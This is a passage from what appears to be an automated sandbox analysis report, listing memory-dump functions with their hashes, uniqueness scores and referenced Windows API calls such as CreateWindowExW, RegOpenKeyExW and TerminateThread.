                                  • Instruction Fuzzy Hash: 5232FD74A04228DFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4ea87d2c01c83655951b49117dcda3c453ccf23ecfea1abca403ae1d32632e04
                                  • Instruction ID: 79f5759255666d76585e74fc9c89bd1da1b92438abe4f30f565cbfe440e3e560
                                  • Opcode Fuzzy Hash: 4ea87d2c01c83655951b49117dcda3c453ccf23ecfea1abca403ae1d32632e04
                                  • Instruction Fuzzy Hash: CD22FD74A04228DFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 876a4e708f65e14f4acf027f1ae84f77ebadf08d9a8d37e37c12ed497ce5cfa1
                                  • Instruction ID: fe510614b457464217efa7baa1cadc7213395bcb5d806ebc7d417735d884a47b
                                  • Opcode Fuzzy Hash: 876a4e708f65e14f4acf027f1ae84f77ebadf08d9a8d37e37c12ed497ce5cfa1
                                  • Instruction Fuzzy Hash: 2422FDB4A04228DFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB355E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d5981b36c12d2be87c5956257799ffeb7cb3466c1f66b1d6ea3b71ee3fb503f8
                                  • Instruction ID: 5385692ce94f1112d6e62a0e0304d7bd39c209e28e84c7e352d5257bd7161bfa
                                  • Opcode Fuzzy Hash: d5981b36c12d2be87c5956257799ffeb7cb3466c1f66b1d6ea3b71ee3fb503f8
                                  • Instruction Fuzzy Hash: A522FDB4A04228DFDB64EF70C89879DB7B6BB88305F1081EAD50A93784DB355E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7c2424c5499270baac79209d6e1af5de51432b2ec49097f181ce6105252dde68
                                  • Instruction ID: 26aee3f9e591add40b7f0b86a18cc7f2bfb201591b48fbbd557a57c300d37f63
                                  • Opcode Fuzzy Hash: 7c2424c5499270baac79209d6e1af5de51432b2ec49097f181ce6105252dde68
                                  • Instruction Fuzzy Hash: 8922ECB4A04228DBDB64EF70C89879DB7B6AB88305F1081EAD50AD3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f6c3aafe622959f8f657c51eb0f6137d2f1ea7f029ccaf0e46fa5734e51532d0
                                  • Instruction ID: ceb59b8130f96117d2d741fe011e0ae9ef9cccbe58a5205e7ab336b5742df775
                                  • Opcode Fuzzy Hash: f6c3aafe622959f8f657c51eb0f6137d2f1ea7f029ccaf0e46fa5734e51532d0
                                  • Instruction Fuzzy Hash: C522ECB4A04228DBDB64EF70C89879DB7B6AB88305F1081EAD50AD3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: edf0e62b1655393427172ac1e49a4ca108a8360dda20dc0d5799eb5b1e4aa393
                                  • Instruction ID: 112da243351330fb0b717faab09f36e8618c98d9938f59d68a7700eab9257312
                                  • Opcode Fuzzy Hash: edf0e62b1655393427172ac1e49a4ca108a8360dda20dc0d5799eb5b1e4aa393
                                  • Instruction Fuzzy Hash: 1012FBB4A04228DBDB64EF70C89879DB7B6BB88305F1081EAD50AD3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7607765475f4db8649178ece8bb09a4baab93ac62014fa9dd23825ff452e8235
                                  • Instruction ID: 1a287d98732f985ce9734054cf66b27737ebf09b7e2b563d2d8aadca114d986e
                                  • Opcode Fuzzy Hash: 7607765475f4db8649178ece8bb09a4baab93ac62014fa9dd23825ff452e8235
                                  • Instruction Fuzzy Hash: E712FDB4A05228DFDB64EF70C89879DB7B6AB88305F1081EAD50AD3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4ac45726a8d332b5e6eb00cdae7c8c23245081b865f1ed7acff5b9f44b4900a2
                                  • Instruction ID: 53863d6baba777d18596a9a4c2c35d695c76c64abd41f2c104f257049eba594b
                                  • Opcode Fuzzy Hash: 4ac45726a8d332b5e6eb00cdae7c8c23245081b865f1ed7acff5b9f44b4900a2
                                  • Instruction Fuzzy Hash: 6712FDB4A04228DFDB64EF70C89879DB7B6AB88305F1081EAD50AD3784DB349E85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d66149f6d8931e55f097cbafdbcea94314bb3194f80982e21dc30f3be283234b
                                  • Instruction ID: 6a90b7da30b8e9b7b9e0c9b831143536f5cf058437da75ce5fb9453e9c42ec1c
                                  • Opcode Fuzzy Hash: d66149f6d8931e55f097cbafdbcea94314bb3194f80982e21dc30f3be283234b
                                  • Instruction Fuzzy Hash: E612FDB4A04228DFDB64EF70C89879DB7B6AB88305F1080EAD50AD3784DB349E85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 75aeed60ae07cd073ccff0bae5ea16d3e3f57a0ad6d1ad431a913992dc322006
                                  • Instruction ID: 55883e927a0073bc51fc9702c6fc7d25965eba60648a8365d05818c62c30526a
                                  • Opcode Fuzzy Hash: 75aeed60ae07cd073ccff0bae5ea16d3e3f57a0ad6d1ad431a913992dc322006
                                  • Instruction Fuzzy Hash: 65120CB4A04228DFDB64EF70C89879DB7B5AB88305F1080EAD50AE3784DB349E85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a9802bb127b684023ee5c0092cbcc67d039bd0038db3fc1613742dc652cc4215
                                  • Instruction ID: b6c19318b7352b211b4b0b07cf758122daa1ae2abe0e962bf8b70cfb7b8e3e3f
                                  • Opcode Fuzzy Hash: a9802bb127b684023ee5c0092cbcc67d039bd0038db3fc1613742dc652cc4215
                                  • Instruction Fuzzy Hash: F6020BB4A04228DFDB64EF70C89879DB7B5AB88345F1080EAD50AE3784DB349E85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 55dc1fb12ea8bde937cc956a4a2638560728316642953bfaebd990bb0a2478a6
                                  • Instruction ID: b85fd21d4bfa12258257ee849ff143828e315b784be905b5f8e6888e5e70bde8
                                  • Opcode Fuzzy Hash: 55dc1fb12ea8bde937cc956a4a2638560728316642953bfaebd990bb0a2478a6
                                  • Instruction Fuzzy Hash: ED02FBB4A04228DFDB64EF70C89879DB7B5AB88345F1080EAD50AE3784DB349D85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1f6111c8d1f7ba82fb9018fb84947119c11ca1441b036b2bf2d99a6fd2929566
                                  • Instruction ID: 3b5334896985caadf57a5ed24cfe05c2350f348e31e80614b75e70a538f09117
                                  • Opcode Fuzzy Hash: 1f6111c8d1f7ba82fb9018fb84947119c11ca1441b036b2bf2d99a6fd2929566
                                  • Instruction Fuzzy Hash: FA02FBB4A04228DFDB64EF70C89879DB7B5AB88345F1080EAD50AE3784DB349E85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cdb928961860955d715ebce6ddb65f12268517c63697a535db3bce65a31bd54b
                                  • Instruction ID: a251c6f85c7e77b05674b85f96197356f64059252f77a3ea317f14b076d2b2a7
                                  • Opcode Fuzzy Hash: cdb928961860955d715ebce6ddb65f12268517c63697a535db3bce65a31bd54b
                                  • Instruction Fuzzy Hash: 7D02FBB4A04228DFDB64EB70C89879DB7B5AB88345F1080EAD50EE3784DB349E85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b5fb1d3409df769869e5f4bb99c8b965194e8ded4c39d355b99c2f441ce49044
                                  • Instruction ID: 252e295fd0612645290d0058b5fa2007fb3d1f61c55580ff8d72e4b4468b152a
                                  • Opcode Fuzzy Hash: b5fb1d3409df769869e5f4bb99c8b965194e8ded4c39d355b99c2f441ce49044
                                  • Instruction Fuzzy Hash: CFF11BB4A04228DFCB64EB70C89879DB7B5AF88345F1080EAD50AE3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 162180b3f6ec375938c6b820523ab5d3e10585c9eb2cceeb87b01410e8694343
                                  • Instruction ID: a851f4e6a71b697cc6d643e8f35f2138ac6a7a1be5aacfc07d53bfe1418fcb5b
                                  • Opcode Fuzzy Hash: 162180b3f6ec375938c6b820523ab5d3e10585c9eb2cceeb87b01410e8694343
                                  • Instruction Fuzzy Hash: 80F10BB4A042289FDB64EB70C89879DB7B5AB88345F1080EAD50EE3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 057c8fd776840c87cc27bbd3ac66620c503deabf7c31b7a4ef4451eb902a6701
                                  • Instruction ID: 2e68efd3555880f0b7343a8470c0bcdd6927d229f352f4ee446aa86d6e27015c
                                  • Opcode Fuzzy Hash: 057c8fd776840c87cc27bbd3ac66620c503deabf7c31b7a4ef4451eb902a6701
                                  • Instruction Fuzzy Hash: 70F10BB4A042289FDB64EB74C89879DB7B5AF88345F1080EAD50EE3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a5730918f3d364e20eaf0c02db6f13f20c2af7e949f6f9de5a8dff5099f0cac1
                                  • Instruction ID: ac6e336c155610d626f8342171c47befeac7a15ab53b797768103ca33470d00a
                                  • Opcode Fuzzy Hash: a5730918f3d364e20eaf0c02db6f13f20c2af7e949f6f9de5a8dff5099f0cac1
                                  • Instruction Fuzzy Hash: 28F10CB4A042289FCB64EB74C89879DB7B5AF88345F1084EAD50EE3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 891243b41a9722f3d0286e8ac1d53b5af5017758c63244f8f107160df4c1c6bd
                                  • Instruction ID: 7a850f7f89d2be75b110ccff5d9d91090eadd55bdbea9422737ed73c58ea6155
                                  • Opcode Fuzzy Hash: 891243b41a9722f3d0286e8ac1d53b5af5017758c63244f8f107160df4c1c6bd
                                  • Instruction Fuzzy Hash: 30E11CB4A052289FCB64EB74C89879DB7B5AF88345F1080EAD50EE3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 84a6ff415686c2a80ca32160bebf17c341dd087fc2178d46946996a703a1fb8f
                                  • Instruction ID: 97beffc11e00fc6840b73fc7a26b4e758d3df21c304f8a68d73f62f81ec41ed3
                                  • Opcode Fuzzy Hash: 84a6ff415686c2a80ca32160bebf17c341dd087fc2178d46946996a703a1fb8f
                                  • Instruction Fuzzy Hash: 86E11EB4A042289FCB64DB74C89879DB7B9AF88345F1080EAD50EE3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 728f04366d55713f2d0ec0bdcdae1f0d56f4231fbb257f7a53f85076ad1b9433
                                  • Instruction ID: aa9b81b1b8faa8b220000b02a92b9b7f8b0d4b2e3d114db6b4bb0a376bafcc54
                                  • Opcode Fuzzy Hash: 728f04366d55713f2d0ec0bdcdae1f0d56f4231fbb257f7a53f85076ad1b9433
                                  • Instruction Fuzzy Hash: 08E12FB5A042289FCB54EB74C89879DB7B9AF88345F1080EAD50EE3784DB349D85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 05bcfbcae8705629b7145375d494f459e75a4b78876537718c92923e8172ae6a
                                  • Instruction ID: 1bba2e19c7ea281e4d6335cad3a93ac0cae2523eb0dd88bd95cb137d3a489a34
                                  • Opcode Fuzzy Hash: 05bcfbcae8705629b7145375d494f459e75a4b78876537718c92923e8172ae6a
                                  • Instruction Fuzzy Hash: 5CE12EB5A042289FCB64DB74C89879DB7B9AF88345F1080EAD50EE3784DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ab29517075bdddf8c6bc2530acc1acbbda122fab3b2b96634303b19fb897c423
                                  • Instruction ID: 16963487cbf243dd8f0996b599ca60dfe8b5f90cafd7e56ad98448d3b5b4d14e
                                  • Opcode Fuzzy Hash: ab29517075bdddf8c6bc2530acc1acbbda122fab3b2b96634303b19fb897c423
                                  • Instruction Fuzzy Hash: A0D14FB5A042289FCB64DB74C89879DB7B9AF88345F1080EAD50DE3780DB349E85CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9672857887.0000000000860000.00000040.00000010.sdmp, Offset: 00860000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 051e7b77a31c32da2ec060eef479fade4531d03f90d9b118c1b8125c38acb00e
                                  • Instruction ID: dbe5d63a4163c4f7d72501979fd4fe3cd6809de15ec141ea8d3a4e42e3af5b10
                                  • Opcode Fuzzy Hash: 051e7b77a31c32da2ec060eef479fade4531d03f90d9b118c1b8125c38acb00e
                                  • Instruction Fuzzy Hash: 9DC18030A042198FDB19DB74C494BADB7B2FF85304F2584A9D406EB391DB35AD46CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3109f8ef6c73e506146dd8717a654380c91dc31055010dba29a82f9bb195083b
                                  • Instruction ID: 0b4c9b3d4e546cbb7bc706c91ba623c6372d8f4b58e38b2736e9848390cd81a5
                                  • Opcode Fuzzy Hash: 3109f8ef6c73e506146dd8717a654380c91dc31055010dba29a82f9bb195083b
                                  • Instruction Fuzzy Hash: 7AD12EB5A042289FCB64DB74C89879DB7B9AF88345F1080EAD50DE3780DB349E85CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675193275.0000000000AE0000.00000040.00000010.sdmp, Offset: 00AE0000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d1b1acfe4f397097c54767f4a9526e8537943bf55d9b3881600c2cd5ce9e1eff
                                  • Instruction ID: e92abb1d81ad82ff090eae24e29e07572059acdec29b2150dc62c991d310c536
                                  • Opcode Fuzzy Hash: d1b1acfe4f397097c54767f4a9526e8537943bf55d9b3881600c2cd5ce9e1eff
                                  • Instruction Fuzzy Hash: 6371F830B043449FCB05EBB4C855AAE7BB6AF85304F15896AE506DB392DF74EC09C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 00AFF6F6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675328331.0000000000AF0000.00000040.00000010.sdmp, Offset: 00AF0000, based on PE: false
                                  Similarity
                                  • API ID: FindWindow
                                  • String ID:
                                  • API String ID: 134000473-0
                                  • Opcode ID: 57b6f1c48f80d0c4ab09f8801c2a4332d3ed523b1065ebf8d8f244721488560d
                                  • Instruction ID: e041c57844777ed6d0eb604c68fdb8511b5d4bab5c92816e386ed3faf2cb1132
                                  • Opcode Fuzzy Hash: 57b6f1c48f80d0c4ab09f8801c2a4332d3ed523b1065ebf8d8f244721488560d
                                  • Instruction Fuzzy Hash: 0D71AF76D00755CFDB01DFA8C4402DABBB1FF89314B55862AE50ABB352DB36A950CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9672857887.0000000000860000.00000040.00000010.sdmp, Offset: 00860000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e89319f4f964b13fa51eccef7a1f3ce019eca23e696149006d60c870d09f2416
                                  • Instruction ID: 2330cdba993bc3a7eaa0535bbf5ff30e27ce7fa72c732924cb5cc28a6f1b3f3d
                                  • Opcode Fuzzy Hash: e89319f4f964b13fa51eccef7a1f3ce019eca23e696149006d60c870d09f2416
                                  • Instruction Fuzzy Hash: 02618E74A00219DBCB18EBB4D8997AEB7B5FF84344F118428E406E7390DF799945CF92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D42690A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 7d7f9e14e7f2a7c8f34573397429475564f8674c5dc455736067158516095361
                                  • Instruction ID: ad25052a31ae6ea522a3a38628afd3e21ac883fd33bc2195ee59e68e61d1ef46
                                  • Opcode Fuzzy Hash: 7d7f9e14e7f2a7c8f34573397429475564f8674c5dc455736067158516095361
                                  • Instruction Fuzzy Hash: 4A5147B1C093899FCB02DFAAD890ACEBFB1BF49314F25815AE444AB251D7349944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675328331.0000000000AF0000.00000040.00000010.sdmp, Offset: 00AF0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48dd77795408a3cb5faf6c73700a09f1d48f30cef5be5aa0b55e5df770429766
                                  • Instruction ID: 82d021301a06bb0949d446e61fa1db5eaae6a2b3da5885e9172c4717fff7a4ee
                                  • Opcode Fuzzy Hash: 48dd77795408a3cb5faf6c73700a09f1d48f30cef5be5aa0b55e5df770429766
                                  • Instruction Fuzzy Hash: CC413671D083954FCB10DFB5D8006EEBBB1EF89310F15866ED545A7282DB349845CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D42690A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 9c345635b33c5a73d6beccbadd9f5553eec027d8de7f2ae04aa5d3d70f1e4df3
                                  • Instruction ID: 90032b7d5ac1ea0c78ea093826c0cdfd9c6bfb483085f6c5191d71d6ca85acc4
                                  • Opcode Fuzzy Hash: 9c345635b33c5a73d6beccbadd9f5553eec027d8de7f2ae04aa5d3d70f1e4df3
                                  • Instruction Fuzzy Hash: 3551C0B1D003099FDF14CFA9D884ADEBBB5FF48310F60822AE819AB210D775A945CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D42A5D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: ab9c1f0e9c75b1691df6057bb3dcb426d0d8c60ef511aaa8dd4bc19d65ce47ef
                                  • Instruction ID: 695f5e2f670b6cde9626eb5a6cca9b84e7d43e3dc813ad04711a67d8160e7f9c
                                  • Opcode Fuzzy Hash: ab9c1f0e9c75b1691df6057bb3dcb426d0d8c60ef511aaa8dd4bc19d65ce47ef
                                  • Instruction Fuzzy Hash: 334191B86843A48FE7019FA4E4D5BFE7BB5F789B20F604069E9018B382C7754951CB21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00AEDD61
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675193275.0000000000AE0000.00000040.00000010.sdmp, Offset: 00AE0000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: ed2eb989ab2f713eb7e3b3dd866d37a60d686cebd6face2d05600a601a8a842e
                                  • Instruction ID: 27ad9cfa35e8d4e7037d69523ecac0ef607523d172ad33bb22cdff054a56d50f
                                  • Opcode Fuzzy Hash: ed2eb989ab2f713eb7e3b3dd866d37a60d686cebd6face2d05600a601a8a842e
                                  • Instruction Fuzzy Hash: 43415AB1E052589FCB10CFAAC884BCEBFF5AF48300F15846AE818AB351D7749805CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D42690A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 656485e4e229ee8a51204fcdd0fbae1328b1c3f6bbbccd5fab0487e9ea547016
                                  • Instruction ID: 678cb20f693cc53d5fb23bb1978e504ae74e21dd0e8893dd2f4a0f9d194acae0
                                  • Opcode Fuzzy Hash: 656485e4e229ee8a51204fcdd0fbae1328b1c3f6bbbccd5fab0487e9ea547016
                                  • Instruction Fuzzy Hash: 1251A0B1D00309DFDB14CF99D884ADEBBB5FF48310F64812AE819AB210DB75A945CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00AEDAA4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675193275.0000000000AE0000.00000040.00000010.sdmp, Offset: 00AE0000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 5f83f052a60eb062409ea0193ce3ae38063e1af3475c64489f624d9889a8d6da
                                  • Instruction ID: 5d085b681d0dab252353e86b1f7a17746833dd23c3fa726c02b0e1e73f48c746
                                  • Opcode Fuzzy Hash: 5f83f052a60eb062409ea0193ce3ae38063e1af3475c64489f624d9889a8d6da
                                  • Instruction Fuzzy Hash: 92414970D093898FDB10CFA9C544A9EFFF1BF49308F29C1AAE408AB256C7759945CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 1D42B4E1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: 4924ead008b8e8d283ba2825ee085e717bf41e398ad13a3a2048fbcba2ff72b8
                                  • Instruction ID: 0ccbc899276b85fea5d93c3e5f9d3a82fb70a35111f0a1761153fd0423da8591
                                  • Opcode Fuzzy Hash: 4924ead008b8e8d283ba2825ee085e717bf41e398ad13a3a2048fbcba2ff72b8
                                  • Instruction Fuzzy Hash: C34149B4A043099FCB00CF99D488AAAFBF5FF89324F24C459D519AB325D734A841CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • TerminateThread.KERNEL32(-00000001A98E2473,52793E8C), ref: 0056BF19
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9672248989.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 0533aad8a9043a9b55ed21f992108f1a502e5919155ae44165cdf9474999eb95
                                  • Instruction ID: 035d632afb988a2a82db0d31b54dff062e0bb77dce661764d265dde4014b3d33
                                  • Opcode Fuzzy Hash: 0533aad8a9043a9b55ed21f992108f1a502e5919155ae44165cdf9474999eb95
                                  • Instruction Fuzzy Hash: A7315A35248260AFEB328F64CCC47E97BA6FF45310F694299D94C9F7A5C3328982CB41
                                  Uniqueness
